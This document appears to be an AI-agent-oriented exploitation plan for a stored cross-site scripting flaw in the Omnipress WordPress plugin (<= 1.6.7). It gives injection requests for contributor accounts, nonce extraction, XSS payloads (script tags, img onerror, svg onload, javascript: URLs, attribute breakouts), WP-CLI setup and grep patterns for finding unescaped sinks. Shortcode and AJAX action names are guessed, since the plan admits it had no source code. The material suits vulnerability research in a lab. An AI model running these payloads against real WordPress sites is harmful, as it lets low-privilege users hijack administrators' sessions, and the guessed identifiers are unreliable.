Omnipress <= 1.6.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Based on the vulnerability details provided for CVE-2026-25432, here is a structured exploitation research plan. Since the source code was not provided, this plan relies on identified patterns for "Omnipress" plugins and common WordPress vulnerabilities, with explicit instructions for the agent to verify identifiers.

---

1. Vulnerability Summary

CVE-2026-25432 is a Stored Cross-Site Scripting (XSS) vulnerability in the Omnipress plugin (<= 1.6.7). The flaw exists because the plugin fails to sufficiently sanitize user-supplied input and escape output when rendering data. This allows an authenticated user with Contributor-level permissions or higher to inject malicious JavaScript into a post or page. When other users (including administrators) view the affected content, the script executes in their browser context.

2. Attack Vector Analysis

• Endpoint: WordPress Post Editor (Gutenberg or Classic) or an AJAX handler.
• Vulnerable Mechanism: Likely a Shortcode attribute or Custom Post Meta field processed by the plugin.
• Payload Carrier: A shortcode attribute (e.g., [omnipress_widget attribute="<script>alert(1)</script>"]) or an AJAX parameter used to save plugin-specific metadata.
• Authentication: Contributor+ (Subscriber does not have edit_posts capability required to save content/shortcodes).
• Preconditions: The Omnipress plugin must be active.

3. Code Flow (Inferred)

1. Input: A Contributor saves a post containing a malicious shortcode or submits an AJAX request to update plugin data.
2. Storage: The plugin captures the input. If it's a shortcode, it's stored in wp_posts.post_content. If it's an AJAX handler, it likely uses update_post_meta() or update_option().
3. Sink: When the post is rendered on the frontend, the plugin's rendering function (e.g., the shortcode callback) retrieves the data and outputs it using echo or print without applying esc_html(), esc_attr(), or wp_kses().

4. Nonce Acquisition Strategy

If the vulnerability is triggered via a shortcode in a post, no nonce is required for the injection phase, as the standard WordPress post-saving mechanism handles CSRF protection for the editor.

However, if the injection occurs via a plugin-specific AJAX handler:

1. Identify Localization: Search for wp_localize_script in the plugin folder:
   grep -rn "wp_localize_script" /var/www/html/wp-content/plugins/omnipress/
2. Locate Variable: Look for a variable name like omnipress_params or omnipress_ajax.
3. Extraction:
   • Create a post and add any Omnipress-related block/shortcode.
   • Navigate to the post editor as a Contributor.
   • Use browser_eval to extract the nonce:
     browser_eval("window.omnipress_params?.nonce") (Verify actual key names via grep).

5. Exploitation Strategy

Case A: Shortcode Attribute (Most Likely)

1. Identify Shortcodes:
   grep -rn "add_shortcode" /var/www/html/wp-content/plugins/omnipress/
2. Identify Unescaped Attributes:
   Look at the callback function for the shortcode and check for echo $atts['attribute_name'].
3. Request:
   Use http_request to save a post as a Contributor:
   • Method: POST
   • URL: http://localhost:8080/wp-admin/post.php
   • Body: post_ID=[ID]&post_content=[omnipress_shortcode param='"><script>alert(document.domain)</script>']&action=editpost... (Include standard WP editor fields).

Case B: AJAX Post Meta Update

1. Identify AJAX Actions:
   grep -rn "wp_ajax_omnipress" /var/www/html/wp-content/plugins/omnipress/
2. Request:
   • Method: POST
   • URL: http://localhost:8080/wp-admin/admin-ajax.php
   • Content-Type: application/x-www-form-urlencoded
   • Body: action=omnipress_save_meta&post_id=[ID]&meta_value=<img src=x onerror=alert(1)>&_ajax_nonce=[NONCE]

6. Test Data Setup

1. Create User: wp user create attacker attacker@example.com --role=contributor --user_pass=password
2. Identify Active Shortcode: Find a valid shortcode name via grep (e.g., [omnipress_social]).
3. Create Target Post: wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_author=[Attacker_ID]

7. Expected Results

• Storage: The database should contain the raw payload in wp_posts or wp_postmeta.
• Execution: When visiting the post URL, the browser should execute the JavaScript.
• Response: The HTTP response for the view request should contain the literal string <script>alert(document.domain)</script> or the injected HTML tag.

8. Verification Steps

1. DB Check: Use WP-CLI to verify the payload is stored:
   wp db query "SELECT post_content FROM wp_posts WHERE ID = [ID]"
   Or for meta:
   wp post meta get [ID] [meta_key]
2. Frontend Check:
   Use http_request (GET) on the post permalink and check if the payload exists in the source:
   grep "<script>alert(document.domain)</script>"

9. Alternative Approaches

• Attribute Breakout: If the input is placed inside an HTML attribute (e.g., value="INPUT"), use " onmouseover="alert(1)" or "><script>alert(1)</script>.
• URL-based XSS: If the plugin handles links, try javascript:alert(1) in a URL parameter.
• SVG Injection: If the plugin allows uploading or defining SVG paths, use an SVG payload:
  <svg onload=alert(1)>

10. Grep Patterns for Discovery

Run these in the omnipress directory to find the specific sink:

# Find shortcode callbacks
grep -rn "add_shortcode" .

# Find echo/print sinks involving variables (potential XSS)
grep -rnE "echo|print" . | grep -vE "esc_html|esc_attr|esc_url|wp_kses|absint|intval"

# Find AJAX handlers
grep -rn "wp_ajax_" .